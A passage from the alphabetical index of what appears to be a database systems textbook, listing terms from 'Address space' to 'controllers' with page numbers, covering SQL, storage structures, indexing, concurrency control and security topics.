159, 167-168, 174-175, 179, 181-182,
187-188, 191-192, 199-200, 205-209,
212-213, 227-229, 236-237, 244, 253, 256,
260, 262-263, 267, 277-279, 282-283,
288-290, 305-306, 346, 349, 351, 354, 356,
361-362, 366, 369, 396, 418-419, 435,
449-453, 462, 467-468, 486, 489, 507,
511-513, 531, 552, 571-572, 595-597, 607,
611-617, 630-632, 666-668, 677, 706-707,
714-715, 718, 731-732, 812-813, 846-847,
865, 867-868, 877, 925, 927-928, 956,
993-994, 1022, 1025, 1054-1055, 1063-1065

Address space, 612-616
Addresses, 2-3, 12, 62, 191-192, 195, 277, 598, 603,

608, 611, 613-615, 617, 629, 637, 654,
666-667, 673, 816, 853, 911, 994, 1024,
1027

base, 1024
fields, 603, 608, 637
Internet, 853
introduction to, 2, 994, 1010, 1024, 1027
IP, 629, 1024
logical, 62, 613, 637, 673
main memory, 598, 603, 611
map, 667
memory, 598, 603, 611, 629, 635, 816
network, 598, 1010
number of, 191-192, 195, 208, 603, 608, 613-615,

617, 619, 654, 666-667
partitioning, 637
physical, 608, 637, 673
real, 2, 62
relative, 614-615
TCP, 629
virtual, 1024

Addressing, 613-614, 853
blocks, 614
level, 853
scope, 613

adjusting, 714
Administrator, 13, 84, 310, 839, 841-842, 853-854,

856, 870, 873, 919, 950, 1047
Administrators, 13, 311, 733-734, 839, 853, 870, 1048
Adobe, 892
Advanced Encryption Standard (AES), 864
Agent, 11, 852, 916, 1023, 1029, 1036
aggregation, 124, 189, 228-230, 269-272, 274-276,

285, 356, 520, 543, 955, 1037, 1042, 1062
dependency, 520, 543
Exception, 269
objects and, 270-271
String, 886
use of, 271, 356, 886, 1042

Algebra, 55, 71, 75, 81, 82-83, 92-93, 97, 99, 148-200,
245, 296, 301, 416, 686-687, 690, 704-708,
711, 713-714, 730, 895, 902-904, 907, 953,
978-979, 987, 989, 996

algebraic, 71, 686, 708, 713-714, 723-724, 728, 987
algorithm, 198, 287-288, 293, 296, 299, 301, 304, 372,

399, 415, 510, 538, 551, 555-558, 560-569,
573-574, 577, 582, 584, 586, 608, 610,
612-613, 621, 635, 648-649, 660, 662, 665,
674, 678-679, 688-690, 694-695, 698-702,
704-705, 713-715, 723, 728-730, 761-762,
790-794, 810, 814-815, 819-822, 826, 839,
864-866, 912, 989, 1003, 1005, 1019-1020,
1031-1033

merge, 610, 688-689, 694-695, 699, 702, 704,
729-730

representation of, 705
algorithms, 39, 56, 287, 301, 304, 350, 372, 436, 510,

521, 550-586, 613-614, 619, 633-635, 646,
654, 656, 659-660, 665, 668, 675, 679,
684-730, 732, 783, 807-808, 810-811, 821,


831, 835, 864-865, 873, 901-902, 905,
924-926, 962, 988, 995-996, 1001, 1016,
1018-1020, 1027, 1031-1033

algorithms:, 613
analysis of, 635, 679, 926, 1018, 1029
Data Encryption Standard (DES), 864
decryption, 864-865
encryption, 839, 864-865, 873
graphs, 706, 708, 807
mathematical, 555, 864
properties of, 510, 551, 558, 568, 573, 582-583,

1016, 1019
queue, 783
recursive, 651, 665
set, 350, 510, 521, 550-562, 564-569, 573-575,

577-579, 582-586, 654, 660, 665, 668,
689, 692, 696-697, 701-705, 711-712,
719, 728-729, 794, 962, 996, 1001, 1023,
1031

statements, 39
aliases, 96-97, 119, 178, 941
Alice, 68, 111, 159, 199, 305, 732, 990
alignment, 1023
ALL, 1-4, 7-9, 11-13, 15-16, 19-20, 22, 24, 26, 27, 34,

36, 42-43, 46-47, 51-52, 57, 59, 63-67, 70,
73-77, 87, 90-93, 95, 97-105, 107-108,
117-126, 128-130, 132-133, 135, 137-139,
141, 151-152, 154-158, 160-161, 163-167,
169-176, 178-181, 183-187, 189-196, 204,
210-212, 219, 221-223, 228, 232, 234, 237,
239, 241, 246-247, 251-253, 255-262,
264-266, 274-279, 281, 283, 289-291,
294-295, 297-301, 313-314, 318-319, 321,
325, 328, 330-331, 339, 348, 354-355,
360-363, 365, 367-373, 379-383, 386-389,
391-392, 399-401, 403-408, 411-412,
420-422, 430, 434, 436-438, 446-447, 465,
483-484, 495-496, 503-504, 516-517,
521-524, 540-545, 555-563, 566-567, 572,
577-578, 584, 598-601, 604-608, 617,
620-622, 624-625, 634, 670-674, 677-678,
700-703, 711-713, 717-719, 726-727,
740-746, 749-752, 754-765, 770-772, 775,
787-790, 792-801, 803-804, 814-816,
840-846, 848-851, 858-859, 870-872,
874-875, 879-880, 895-898, 902-913,
916-917, 920, 922, 924, 940-941, 956-961,
966-968, 970-982, 987-988, 1020-1022,
1060-1064

Amazon, 3, 915
American National Standards Institute (ANSI), 53, 83
ampersand, 425
analog, 189

data, 189
Ancestor, 438, 986

complete, 986
descendant, 438
node, 438
parent, 438, 986
root, 438

Anchor text, 1019
AND, 1-26, 27-54, 55-81, 82-85, 87-93, 95-109, 112,

115-147, 148-200, 201-215, 217-224,
226-239, 241-245, 246-266, 268-285,
287-308, 309-356, 357-419, 420-428, 430,
433-442, 444-448, 454-487, 490-506,
508-549, 550-586, 636-638, 640-641,
645-649, 651-679, 684-730, 732, 733-746,
780-809, 836-876, 900-927, 934-989,
1034-1049, 1058-1065

AND function, 129, 406, 1008
AND operation, 14, 360, 406, 409
anonymous, 919
ANSI, 31, 33, 53, 83, 143, 355
ANY, 3, 7-9, 13, 16-17, 28, 30-31, 35, 38, 45-46,

48-49, 59-60, 62, 64-65, 69, 72, 75-76,
79-80, 85, 91, 95, 97, 99-100, 104, 125,
134-136, 138-139, 141, 152-157, 160-161,
164, 173, 177-178, 185, 188-189, 191, 193,
195-196, 198, 210-212, 220, 222, 231,
233-234, 236-237, 239, 241, 248-249,
253-254, 264-266, 278, 280-281, 292-294,
296-301, 314, 316-318, 320-322, 332,
336-337, 348, 350, 363, 377, 392, 399,
401-405, 408-409, 412, 434-435, 459-460,
464-466, 471-474, 476-477, 481, 501-502,
508, 524-526, 539-542, 545-546, 551-557,
559-562, 568, 578-579, 604-605, 627-628,
630-631, 636-637, 666-668, 672-673,

691-694, 708, 711-713, 720, 734-735,
756-763, 765-769, 772-773, 775, 782-784,
793-794, 796-801, 811-814, 818-821,
824-826, 829-833, 851-853, 861-864, 881,
911-913, 915-916, 962, 970-972, 977,
979-980

API, 45, 413, 428, 456, 471, 476, 870
apostrophe, 100, 425
application, 3-5, 7-11, 14, 18-25, 27-28, 31, 33-35,

38-46, 48, 52, 64, 70-71, 75, 78, 82, 84, 109,
201-205, 230, 232, 237, 239, 241, 247, 262,
264, 275-276, 278, 280, 285, 312-315,
317-321, 333-335, 339-342, 344, 351-353,
355, 363, 367, 370-371, 374, 389-390, 401,
413, 415, 428, 455-456, 461, 476-477,
480-481, 545-546, 561, 727, 851, 853-855,
864, 867-870, 877-879, 882, 885-886,
891-894, 907, 914-920, 924-925, 940-943,
951, 957-959, 962-963, 1016, 1018,
1022-1024, 1026-1027

application layer, 892-893
application log, 1027
application programming interface, 45, 428, 456, 471,

476
Application server, 40, 46, 480, 892-894, 920
application system, 314-315
Applications, 1-3, 8, 11, 14-15, 18-25, 30, 32, 42-43,

45-48, 51-52, 70, 75, 82-83, 124, 133, 149,
164-165, 173, 177, 201, 235, 237, 274, 285,
311-319, 321-322, 328, 330-332, 336,
341-342, 344, 351-353, 355-356, 365, 414,
416, 456-457, 590, 592, 600, 610, 621,
626-627, 679, 739, 744-745, 773-774, 779,
794, 852-854, 856-857, 866, 869-870, 890,
894, 918, 922, 924, 926, 929-989, 991,
1018, 1022-1024, 1026-1027, 1045

applications of, 1, 342, 679, 745, 930-931, 940,
962-963, 982-983, 988, 999, 1026, 1031

search trees, 679
architecture, 27-54, 317, 353, 394, 416, 458, 480, 491,

497-499, 505, 588, 635, 870-871, 886-893,
915-916, 919-921, 926, 1037, 1044-1045

client/server, 27-28, 42-46, 51-52, 458
file system, 47
IEEE, 416
middleware, 46, 48, 886
protocol, 499, 892, 916, 919, 921
three-tier client/server, 46, 52

Arguments, 10, 328, 338, 360, 365, 369, 379, 406,
497-499, 503, 542, 554, 798, 968-971,
973-974

array, 497-499, 503
example of, 542, 970
multiple, 338, 497, 798, 970
names, 10, 360, 379, 406, 503, 968-969, 971
of parameters, 379
passing, 360

Arithmetic, 62, 100-101, 134, 169, 438, 581, 583, 613,
742, 866, 970

expression, 438
operators, 100-101, 970

Arithmetic operations, 134, 169, 970
arithmetic operators, 100-101

list of, 101
Array, 310, 363, 373-375, 377, 385-386, 388-389, 393,

414, 479, 492-493, 495-501, 503-505, 591,
611-613, 617, 623-625, 667-669, 676, 960

accessing, 499-500, 505, 667, 676
elements of, 363, 388
of objects, 363, 386
ordered, 363, 388, 611, 668, 676
size, 310, 363, 385, 389, 393, 617, 960
size of, 310, 617
variable, 363, 479, 492-493, 496-497, 499-500,

503-504
array of, 310, 363, 591, 611-612, 617, 623-625, 669

code, 612, 623
Array variables:, 496
Arrays, 409, 459, 492-493, 495-497, 505, 588,

623-624, 630, 635, 965
element of, 409
elements, 409, 492, 495-497, 505, 965
higher dimensional, 496
parallel, 623
parameters, 492-493
string, 493, 495, 497, 505
variables, 459, 495-497, 505

arrays, and, 505
AS:, 58, 168, 538, 549, 585, 727, 849, 923, 931, 1020

ASCII, 612
aspects, 30, 40, 56, 81, 143, 268, 281, 309, 313, 334,

350, 355, 381, 416, 486, 523, 842, 853, 965,
998-999, 1032, 1043

Assertion, 62, 70, 83, 92, 115, 131-132, 139
Assertions, 70, 84, 105, 131, 141, 481, 582, 1006
assessment, 868-869, 875, 998, 1000, 1002
assets, 868
assignment, 11, 58, 494, 667, 738, 862, 940, 970

declaration, 940
local, 58
statement, 934, 940
this, 11, 58, 494, 667, 738, 862, 940, 970

Assignments, 178, 497-499, 984
Association, 29, 81, 214, 229-230, 269-271, 346, 385,

389, 867, 887, 944, 961-962, 983, 988, 1025
associative, 157, 389, 493, 496-497, 712, 723, 834

sequence, 496
Associative array, 493, 496-497, 499
Assurance, 841-842
asterisk (*), 97, 125, 229
Atom, 179-180, 186-187, 190, 362-363, 382, 390
AT&T, 25, 358, 417
Attacks, 851, 856-859, 868-869, 874-875, 1027

types of, 857, 874
attribute values, 72-73, 89-90, 92-93, 95, 97, 100,

103-104, 126, 146, 178-179, 185, 206, 208,
211, 221, 270, 361, 373, 390, 401, 457,
468-469, 510, 514, 693, 849-851, 963

Attributes, 29, 57-61, 63-67, 69-70, 72-76, 79-80, 85,
87, 89-91, 93, 95-97, 99, 101-103, 105-107,
109, 119-120, 122-126, 134-135, 137,
140-141, 150-156, 158, 160-163, 166-170,
172-176, 178-179, 181-182, 186-187,
189-190, 193, 196, 202, 205-214, 216,
220-224, 226, 229-230, 234-237, 241, 245,
249-251, 261-262, 264-266, 273-276,
278-280, 282, 284, 287, 289-300, 320-322,
333, 342, 350, 360-361, 364-369, 372-375,
378-380, 386, 390-392, 394-395, 398-402,
404, 406, 410-411, 413-415, 421-422,
427-430, 437-439, 441-442, 448, 459-460,
464-465, 471-472, 502, 508-511, 513-517,
519-526, 528, 537-540, 542-546, 551-553,
555-560, 565-570, 572-575, 581-582,
584-585, 592, 675-676, 692, 697-700, 727,
734-738, 741-742, 849, 886, 895-896, 898,
904-906, 945-946, 948, 1040, 1050-1051

of entities, 202, 205, 209-210, 214, 234, 261, 265,
274

Audio, 1, 591, 600, 623, 930, 963-964, 967, 982, 984,
988, 996, 998, 1017, 1029

compression, 964
audio files, 996
auditing, 757, 875, 919
Australia, 245
Authentication, 628, 842, 855-858, 865-867, 919

digital signatures, 866
intrusion detection, 842
means of, 842, 866
password-based, 919
summary, 919

authorization, 17, 38, 83-84, 106, 135, 416, 460, 838,
840, 843-846, 851-852, 854, 871-873, 875,
1065

Autocommit, 467
Autoindexing, 1032
Average, 3, 11, 125-126, 141-142, 169-171, 191, 193,

276, 284, 312, 333, 369, 406-407, 410, 485,
570, 595-596, 603, 607-608, 610-611, 629,
631-634, 645, 654, 659-660, 670, 675, 682,
717-722, 860-861, 955, 1005, 1029,
1054-1055, 1063

average access time, 610
average seek time, 631, 634, 1054

B
background, 863, 916, 966, 989

noise, 966
backgrounds, 961
Backing up, 592, 597-598, 830
Backup utility, 41
backups, 41, 628
Backward compatibility, 916
Bag, 92, 153, 363, 367-368, 373-374, 384-386,

388-389, 401, 403, 405, 407-408, 410-411,
414

Balanced tree, 657, 960
base, 33, 43, 56, 85, 105, 123, 133-139, 142, 232,


266, 337, 361, 514-518, 520, 525, 549, 585,
650, 657, 723-724, 735, 737-738, 744,
846-847, 926, 936, 951, 958, 976, 979, 986,
1024

identifying, 232
Base class, 266
Basis, 48-49, 55, 148-149, 177, 189, 247, 249, 273,

333, 378, 706, 729, 966, 989, 1004, 1020
Batch processing, 328
Berg, 635
bgcolor attribute, 497
Binary operation, 706
Binary relationship, 216, 218, 223-224, 226, 229,

231-233, 236, 241, 364, 390, 399, 401-402,
412

Binary search, 608, 610-611, 629, 632-633, 637-638,
640, 642, 645, 648-649, 675, 679, 682, 691,
718

Binary search algorithm, 645
Binary search trees, 679
Binary trees, 654

full, 654
Bioinformatics, 962, 1022
Bit, 87, 121, 591, 593-594, 607, 617, 619, 623, 625,

666, 669-671, 813-814, 864-865, 1041-1042
Bit string, 87
Bitmap, 636-637, 668-671, 674-676, 1041-1042
Bitmap index, 668-671, 676, 1042
Bits, 87-88, 298, 593, 597, 617, 619, 624-625, 630,

635, 636, 667-671, 864, 964, 1042
BitTorrent, 996
BLOB, 88, 600
Block, 55, 92, 120, 336, 590, 594-599, 602-605,

607-611, 614-615, 617, 619, 623-626,
629-634, 638-649, 651-661, 668, 673-674,
676-678, 681, 686-692, 694-695, 716-719,
721-723, 725-726, 741, 749-750, 758,
798-799, 813-814, 823, 835, 843, 864, 866,
934-935, 1054-1056

Block transfer, 596, 599, 629, 631-632, 634,
1055-1056

Blocks, 117, 120, 332, 381, 588, 594-598, 600-611,
614-616, 621, 625, 629-633, 636-638,
640-641, 645-649, 651-652, 655-656, 658,
666, 674-675, 677-678, 681-682, 686-690,
694-695, 698-701, 716-719, 721-722, 729,
744-745, 750, 755, 758, 801, 814, 823, 864,
908, 1054-1055

record blocking, 602
blogs, 999
, 423-424

call, 482, 980
books, 3, 24, 79, 143, 191-193, 239, 267, 276-277,

319, 354-355, 416, 424, 427, 455, 480,
485-486, 505-506, 547, 586, 679, 746, 835,
923, 927, 963, 982, 997, 1032, 1049

Boolean, 87-88, 93, 116-117, 120, 150-152, 178-179,
211, 297-298, 366, 382-386, 408, 467, 574,
600, 604, 670, 713, 957, 999-1002,
1006-1007, 1014, 1029-1030

false, 88, 116-117, 120, 152, 178-179, 386, 408,
600, 1014

true, 88, 93, 116-117, 120, 151-152, 178-179, 386,
408, 600, 1007

Boolean condition, 93, 179, 408
Boolean values, 382
border, 423
Braces, 140, 209, 528
Brackets, 102, 129, 140, 182, 423, 425, 464, 708
Branches, 239-240, 286, 713
break, 154, 184, 446, 483, 713-714, 864, 894, 1012

do, 154, 184, 446, 483, 714, 894
if, 184, 446, 483, 713-714, 894, 1012
loops, 483

brightness, 965
Browser, 46, 441, 490-491, 493, 892, 926, 963
Browsers, 13, 331, 892

primary, 13
B-tree, 622, 652, 654-660, 665, 675-676, 678-679
Bubble sort, 688
Buckets, 614-621, 630-631, 633-635, 666-668, 673,

682-683, 695, 702, 959-960
Buffer, 38, 40, 595-596, 598, 604-605, 607-608, 611,

644, 679, 688-690, 698, 715, 723, 726, 729,
739-740, 750-751, 757-758, 805, 812-815,
819-820, 825-826, 830, 832-833, 957, 1054,
1056

Buffering, 14, 17-18, 45, 588, 598, 603, 610, 629-630,
632-633, 698, 812, 831

cache, 812
single, 598, 633, 698, 831

Bug, 857
Bugs, 754
Bus, 43, 590, 887
businesses, 628-629, 1018
button, 493
buttons, 14
byte, 10, 593, 600-601, 607, 625, 632, 677
bytes, 3, 10, 474, 593-594, 596-597, 599-602,

624-625, 631-632, 634, 640, 659, 670-671,
677, 708, 902-904, 1005, 1055-1056

C
C, 5-6, 8, 12, 16-17, 19, 36, 40, 54, 77, 80, 83, 93-95,

99-100, 107-109, 112, 116-117, 141-142,
147, 151-153, 179-180, 186, 190-191,
193-197, 231-233, 237, 239-240, 243, 245,
262, 265, 271-272, 280-283, 286, 290, 292,
296-298, 304, 324, 352, 354, 363, 365, 367,
375-376, 379-382, 394, 396, 407-408,
411-416, 446, 448, 454, 457-463, 465-466,
468, 471-475, 484-485, 487, 490-493,
522-523, 527-529, 534-537, 542, 545-549,
562-563, 569-573, 585, 598-602, 612,
631-632, 634, 677-679, 707, 709-714,
720-721, 725, 735, 752-753, 760-761,
767-771, 778, 809, 816-818, 826-828,
848-851, 884-885, 898, 923-924, 978,
985-987, 1020-1021, 1059-1061, 1063-1065

C++, 8, 17, 36, 40, 83, 93, 265, 352, 358-359, 363,
365, 367, 381-382, 394, 402, 411-416, 454,
457, 459, 471, 892

C#, 262, 454, 892
C programming language, 359, 380, 468, 484, 491,

495, 600
Cables, 627, 879
Cache memory, 590
Calendars, 943, 1043
Call statement, 482
callbacks, 428
Canada, 245
Cancel, 341, 771, 840
Candidate keys, 65-66, 76-77, 524, 526, 532-533,

535, 543, 548, 552, 558, 573
Canonicalization, 855
Cards, 548, 590, 1043
Cartesian product, 59, 124, 149, 158-161, 163-164,

167, 189, 212, 214, 702, 708-709, 711,
713-714, 720, 724, 728-729

cartridges, 598
cascade, 73, 90-91, 107, 109, 138-139, 146, 152, 293,

713
case, 4, 9, 18, 33, 35-36, 41-42, 51, 62, 65, 67, 69,

73-74, 87, 91, 95-96, 109, 128, 130, 134,
136-137, 153-154, 180, 182, 187, 221, 226,
229, 232-234, 252-254, 258-259, 270-271,
276, 284, 287, 291, 330, 332-333, 335-338,
349, 351-352, 404, 446, 461-462, 465,
526-528, 537-538, 562-564, 577-578, 590,
596-598, 601-604, 610-611, 614-615, 624,
634, 637, 640-641, 665, 671-672, 679,
699-701, 703-704, 717-723, 726, 749-750,
761-763, 767-768, 819-820, 833, 896-898,
910-911, 977, 979

error, 319, 461, 624, 626, 628, 774
Case sensitive, 87, 494
case statement, 672
Case study, 276
CASE tools, 41, 319, 351, 1050
Catalog, 1, 3, 8-11, 14, 19, 25, 31, 34-35, 38-41,

84-85, 138, 196, 237, 276-277, 340-343,
622, 685, 693, 703, 713, 716-717, 883,
889-890, 905, 919, 921-922, 997, 1017

Cell, 80, 590, 667, 963-964, 1010, 1038
Cell phone, 80
Cells, 667, 963-964, 966
central processing unit, 589, 716
central processing unit (CPU), 589

networks, 589
programs, 748
software, 589
speed, 589

Certificate, 866-867, 874, 919
certification, 772, 780, 797, 805-806, 867
Certification Authority (CA), 867
Chaining, 612-614, 616, 618, 630-631, 633-634, 968
change, 3-4, 7, 10, 19-20, 24, 30-31, 33-34, 58, 72-74,

80, 82, 89, 109, 137, 139, 141, 194,

223-224, 243, 267, 313, 318-320, 339-340,
344, 347, 349, 356, 372, 391-392, 396, 418,
425, 430, 516, 562, 604, 606, 633, 655, 673,
714, 717, 752-753, 760-761, 824-826,
856-857, 950-951, 958-959, 977, 985, 991,
1036, 1044-1045

Channels, 628, 836, 839, 861-863, 873-874, 965
synchronization, 862

chapters, 19, 319, 329, 355-356, 987, 1050, 1052
Character data, 429, 956
character strings, 57, 88, 151, 382, 612, 666, 969, 999

data and, 88
Characters, 3, 5, 9-10, 19, 64, 87, 151, 211, 382, 461,

493-495, 600-603, 612, 630, 634, 858-859,
1007

formatting, 425, 601
order of, 603, 999
special, 64, 382, 461, 494, 601-602
storing, 3, 593, 600

Charts, 318-319, 995
Check, 13, 70, 74-75, 77, 89-90, 92, 117, 120,

131-132, 276-277, 402, 420, 465, 480-481,
484, 524, 558, 560-561, 567, 573, 581, 673,
702, 719, 755-756, 772, 787, 793, 797-798,
800, 807, 934-935, 958, 962, 977, 984, 1043

Checkpoint, 815-816, 819-822, 825-827, 830, 832
Child, 166, 221, 345, 437-438, 442, 444, 651-652,

723, 802-803, 960
child class, 345
China, 245, 998
Choice, 18, 52, 58, 66, 109, 221, 224, 229, 261, 264,

282, 301-302, 315-317, 331-332, 338, 350,
353-354, 401, 592, 626, 740, 989, 997,
1000, 1036, 1044

ciphertext, 863-865
circles, 182, 250, 370, 398, 594, 708
circular, 85, 91, 593
class, 4-10, 17, 19, 29-30, 37, 47-48, 54, 57, 70, 77,

108-109, 112-113, 147, 196, 202, 210, 226,
228-230, 235-236, 242, 246-248, 251,
255-259, 262-263, 265-267, 269-271, 275,
280, 285, 299, 320, 328, 342-343, 345-349,
356, 358-360, 365-371, 386-387, 389-392,
394-406, 408, 411-415, 418, 442-445,
476-478, 484, 545, 578, 632, 849, 856,
861-862, 929, 952, 964, 967, 991,
1050-1051

block, 336, 632
child, 345, 442, 444
derived, 19, 230, 235-236, 255, 320, 400, 412
hierarchy, 255-259, 269-270, 275, 368, 370, 389,

414, 442, 444, 1010
class diagrams, 202, 210, 226, 228-230, 235, 266,

269, 275, 320, 335-336, 342, 345, 347-348
class hierarchies, 259, 359-360
classes, 48, 77, 228-229, 243, 257-261, 266-267,

269-271, 274, 281-282, 299-300, 336, 342,
346, 349, 360, 365, 370, 372, 386-387,
389-390, 392, 394-395, 401, 411, 413, 415,
422, 476-477, 484, 848, 861-862, 872, 1050

arguments, 360, 365
client, 48, 1025
diagram, 228, 243, 259, 266-267, 274, 281-282,

342, 346, 349, 389, 401
instance variables, 360, 365
instances of, 243
interactive, 1032
language, 48, 360, 365, 389-390, 394, 411, 413,

422, 466, 476, 484, 1032
naming, 392
nested, 422
outer, 965
packages, 336
pair, 360, 389-390
separate, 48, 229, 349, 411, 466
top level, 401

classes and, 269-270, 336, 394, 411, 415, 484, 862,
872

ClassNotFoundException, 477-478
cleaning, 1024, 1043-1044, 1047
Cleartext, 864
CLI, 105, 455, 471-475, 484-485, 500, 892-893
click, 350, 465, 1018, 1058
Client, 27-28, 40, 42-48, 51-52, 312, 323, 329, 420,

458, 480-481, 491, 499-500, 505, 628, 887,
892-893, 915-917, 919-922, 926-927, 1025

Client computer, 40, 491, 505
Client program, 40, 45, 458
clients, 22, 36, 43, 45-47, 628, 863, 884, 920


Client-server architecture, 48, 480, 877, 892, 916,
920-921, 1037

Client/server interaction, 45
Client-side, 45
Clock, 312, 792, 944
cloud computing, 878, 914-915, 921-922, 927
Cluster, 85, 140, 596, 614, 622, 641, 643, 645, 655,

678, 718-719, 736-737, 961-962, 1046
Clusters, 603, 962
COBOL, 8, 49, 83, 454
CODASYL, 49, 53
code, 19, 39-40, 57, 62, 77-78, 114, 191, 196,

207-209, 237-238, 243, 277-278, 319, 333,
336, 344, 375-376, 378, 402, 459, 464-468,
471, 473-474, 481-484, 491-492, 506, 522,
545, 547-549, 600-602, 612-613, 632, 634,
665, 670, 677-678, 684-685, 715, 736

described, 40, 191, 209, 237, 243, 482, 545, 549,
585

options for, 378, 464, 601
rate, 632

Code generator, 684-685
Coding, 5, 401, 839
Collection interface, 387-388
Collection type, 363, 374, 377, 386, 389
collision, 612-614, 619, 635

load factor, 635
open addressing, 613-614

color, 151, 208, 210, 281, 424, 496-497, 964-965
process, 493, 964
property, 585

columns, 9, 26, 87-88, 117, 152, 169, 189, 280, 348,
457, 474, 484, 495, 517, 544, 562, 668-669,
671, 674-676, 711, 895, 1016, 1058-1062,
1064

indexing, 348, 668-669, 671, 674-676
Command, 18, 84-85, 90, 102-105, 109, 134-136,

138-139, 424, 455, 459-467, 470-471, 474,
476, 496, 502-503, 740, 750, 763, 782, 820,
844-847, 857, 919, 936-937, 940

command line, 476
Commands, 36-40, 46, 49-51, 83, 102, 108, 137,

139-141, 333, 424, 434, 455-456, 458-460,
462-464, 466-468, 471-472, 481, 484,
493-494, 502, 505, 596, 604, 628-629, 633,
742, 747-748, 839, 857, 859, 872, 879,
891-893, 934, 983

atomic, 774
key, 83, 105, 137, 456, 462, 629, 633, 742, 839,

872
NET, 491
sql, 36-37, 51, 83, 102, 104-106, 108, 137,

139-141, 455-456, 458-460, 462-464,
466-468, 471-472, 481, 484, 502, 844,
857, 859, 872, 892-893, 934, 938

TYPE, 49-50, 140-141, 424, 434, 456, 459-460,
467-468, 472, 481, 505, 629, 742, 818,
839, 857, 859, 872

comment, 283, 561, 733, 964
comments, 245, 434, 492, 499, 514, 561
Commit, 467, 755-758, 760-762, 765, 772, 774-778,

785, 795-796, 811-812, 817-822, 824-825,
827-834, 863, 907-910, 912-914, 916-918,
920, 922, 937, 940

Commit point, 756, 758, 776, 811-812, 817-821, 830
Common Sense, 508
Communication devices, 42
Communications network, 839, 888
Community, 32, 273, 321, 335, 868, 1028
Comparison, 62, 87-88, 93, 100-101, 116-118, 120,

124, 130, 141, 150-151, 161-163, 179, 186,
438, 604, 616, 635, 718-719, 721, 953,
970-971, 996, 1000, 1035, 1060

comparison of, 62, 996, 1029
comparison operators, 93, 117-118, 120, 124, 141,

151, 161, 179, 186, 604, 970, 1060
Compatibility matrix, 801, 807
Compiler, 35, 38-40, 371, 684, 889-890
compiling, 465
Complementation rule, 575
complex systems, 313, 330, 773
Complex type, 19, 362
Component architecture, 889-890
components, 14, 38, 42, 44-46, 48, 61, 133, 184,

207-209, 212-213, 241, 283, 290-294, 311,
334-336, 340, 350, 355, 358-359, 362, 377,
390, 405-406, 410, 543, 629-630, 666,
716-717, 729, 881, 916, 919, 921, 951,
1019, 1030, 1048, 1054

components:, 133, 359, 390, 405-406, 410, 716, 951,
973, 1019

graphical, 350
Composite key, 211, 392, 666, 692, 736
Composite objects, 270, 417
Composition, 1018
Compression, 34, 41, 47, 436, 675, 964, 966

audio, 964
video, 964, 966

Computer, 1-2, 5-6, 10, 18, 25-26, 27-30, 38, 40-44,
47, 52, 54, 56-57, 85, 108, 112, 147, 209,
246, 282-283, 311-313, 319, 323, 332, 349,
352, 357-359, 404-409, 416, 425-426, 455,
458, 476, 487, 497-499, 505, 593, 600-601,
754, 792, 838-841, 857, 875, 914, 924,
995-996, 998, 1026

Computer networks, 44, 877, 924
access, 44, 877

Computer software, 282
computer systems, 282, 312, 359, 748, 838-839, 875
Computer-aided design (CAD), 25
Computers, 2-3, 7, 21-22, 27, 42, 273, 311-312, 491,

590, 593, 716, 995
data storage, 27, 590
function, 42, 716
parts, 22, 997
performance, 22, 312, 590

Computing systems, 877
concatenate, 87, 101, 553, 858
Concatenation, 87, 170, 207, 388, 666
conceptualization, 273, 1047
Concrete classes, 266-267
Concurrency, 11, 14, 20, 24, 39-40, 45, 106, 359, 599,

740, 747-749, 751-752, 755-756, 758-760,
767, 769, 771-774, 776-777, 779, 780-808,
811, 819-820, 835, 842, 875, 893, 905,
907-910, 912, 920, 922, 925

deadlock, 755, 781, 787-791, 793-794, 805-807,
820, 910, 925

mutual exclusion, 781
race conditions, 909
semaphores, 909
starvation, 781, 788, 791, 793, 806-807

Concurrency control, 11, 20, 24, 39-40, 45, 106, 359,
740, 747-749, 751-752, 755-756, 758-760,
767, 769, 771-774, 776-777, 779, 780-808,
811, 819-820, 835, 842, 875, 893, 905, 907,
909-910, 912, 922, 925

Condition, 49-50, 65, 73-74, 93, 95-97, 101-102, 104,
117-120, 123-124, 127-133, 140, 150-152,
156, 160-164, 172, 178-179, 181, 184-187,
253, 338-339, 403, 408, 438-440, 482-483,
493, 520, 524, 535, 537, 556-557, 559,
561-562, 567, 569, 582-583, 604-611, 616,
636, 666, 670, 673, 678, 690-694, 698-699,
711-714, 717-721, 727, 734, 743-744, 761,
772-773, 775-778, 793-794, 798, 860-861,
898, 905-907, 931-932, 934-940, 981, 1064

conditional, 93, 178, 440, 456, 458, 480, 482, 493,
495, 672, 1004

relational, 93, 178
conditioning, 755
Conditions, 19-20, 69, 77, 95, 100, 102, 117, 123, 126,

128-132, 136, 143, 149-150, 152, 162-164,
181-182, 187, 194, 236, 239, 296, 333, 360,
387, 410, 437-440, 460-461, 523-524, 535,
567, 604, 611, 629, 636, 646, 670, 690-693,
713, 719-721, 734, 736-737, 744-745, 754,
760-761, 772-774, 785, 855, 905-907, 909,
922, 936-938, 952-954, 966, 981, 983,
1060-1062, 1064

confidentiality, 837, 855, 860, 865, 871
Confidentiality of information, 860
Configuration, 48, 336, 595
Connection, 45, 155, 458, 460, 466-467, 472-473,

477-479, 628, 879, 918-919
connections, 81, 336, 458, 460, 472-473, 476, 627,

917, 920
Consistent state, 75, 758-759, 811, 829
Constant, 140, 150-151, 169, 179, 182, 185-187, 265,

381, 596, 687, 968, 970-971, 973-974, 978,
1004, 1060

Constants, 93, 187, 194, 549, 585, 969-970, 974,
1058-1059

named, 194
Constructor, 362-363, 366-367, 374, 378, 382, 390,

392, 401-402, 405, 415
constructors, 358, 361-364, 373-374, 377, 382, 386,

401-402, 412-413

overloaded, 373
Contacts, 858
content, 14, 314-316, 628, 855, 864, 868, 963-965,

967, 982-983, 988, 993-994, 997-998,
1017-1019, 1021, 1023-1027, 1029, 1031,
1033

media, 967, 982, 997
Contention, 739-740, 882
contiguous allocation, 603, 607
Continuation, 247, 467
Contract, 993
contrast, 8-10, 134, 148, 221, 256, 294, 353, 362, 491,

514, 592, 851, 965, 970, 1035-1036, 1048
control, 1, 11, 16, 20, 24, 35, 39-40, 43, 45, 84, 106,

222, 273, 310-312, 338-340, 344, 411, 467,
469-470, 479, 497, 548, 594, 629, 747-749,
751-752, 755-756, 758-760, 767, 769,
771-774, 776-777, 779, 780-808, 811-812,
819-820, 838-844, 848, 851-856, 861-863,
868-876, 878, 905, 907, 909-910, 921-922,
925, 958

execution, 39-40, 332, 359, 467, 740, 748-749,
751-752, 755-756, 759, 769, 774,
776-777, 781, 791, 797, 820, 830, 881,
893, 902, 905, 907

Label, 836, 853-854, 862, 869-873, 876
of flow, 836, 839, 862, 874
repetition, 897
transfer of, 751, 861-862

Control system, 43
controllers, 329
